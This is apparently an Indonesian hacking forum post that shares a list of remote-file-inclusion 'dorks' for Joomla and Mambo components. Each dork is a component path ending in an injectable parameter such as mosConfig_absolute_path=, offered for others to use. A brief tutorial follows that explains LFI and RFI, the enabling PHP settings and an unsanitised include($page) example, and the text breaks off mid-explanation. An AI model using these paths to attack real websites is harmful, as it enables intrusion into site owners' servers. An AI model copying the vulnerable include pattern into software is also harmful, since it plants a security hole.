Noh dork RFI , silahkan di sedot wkwkwk buat jooml0 dan mambo0 /components/com_flyspray/startdown.php?file= /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path= /components/com_simpleboard/file_upload.php?sbp= /components/com_hashcash/server.php?mosConfig_absolute_path= /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path= /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= /components/com_performs/performs.php?mosConfig_absolute_path= /components/com_forum/download.php?phpbb_root_path= /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=...

LFI (Local File Inclusion) adalah sebuah bug pada site dimana kita bisa mengakses semua file di dalam server hanya dengan melalui URL. RFI (Remote File Inclusion) adalah sebuah bug dimana site mengizinkan kita meng-include-kan file dari luar server. Fungsi-fungsi yg dapat menyebabkan LFI dan RFI : include() include_once() require() require_once() Syarat pada konfigurasi server: allow_url_include = on allow_url_fopen = on magic_quotes_gpc = off ------------------example---------------------- < ? include($page) ; ?> ------------------------------------------------ misalnya $page=depan.php,di URL : http://www.site.com/index.php?page=depan.php Terlihat bahwa variable page di include...